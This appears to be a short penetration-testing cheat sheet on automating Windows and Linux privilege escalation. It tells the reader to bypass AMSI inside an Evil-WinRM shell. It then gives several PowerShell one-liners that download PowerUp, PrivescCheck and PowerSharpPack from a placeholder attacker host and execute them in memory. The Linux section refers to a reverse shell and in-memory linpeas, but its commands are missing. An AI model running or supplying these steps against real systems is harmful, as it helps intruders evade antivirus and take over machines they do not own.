githubEdit

Automation Privilege Escalation Scripts

1) Windows

If in Evil-WinRM shell, first try to bypass AMSI

Bypass-4MSI

Then, download a powershell script from memory

iex(new-object net.webclient).downloadstring('http://OUR_IP/PowerSharpPack.ps1')

Now, you can use the tool

PowerSharpPack -winPEAS

OR

PowerSharpUp -SharpUp

Alternate script: PowerUp

iex(new-object net.webclient).downloadstring('http://OUR_IP/PowerUp.ps1')

Then

Invoke-AllChecks

Alternate Script: PrivescCheck

iex(new-object net.webclient).downloadstring('http://OUR_IP/PrivescCheck.ps1')

Then

Invoke-PrivescCheck -Extended

Alternate Script: JAWS Enum

2) Linux

If using penelope reverse shell, in our session press F12, then write:

If not, run linpeas.sh from memory

Last updated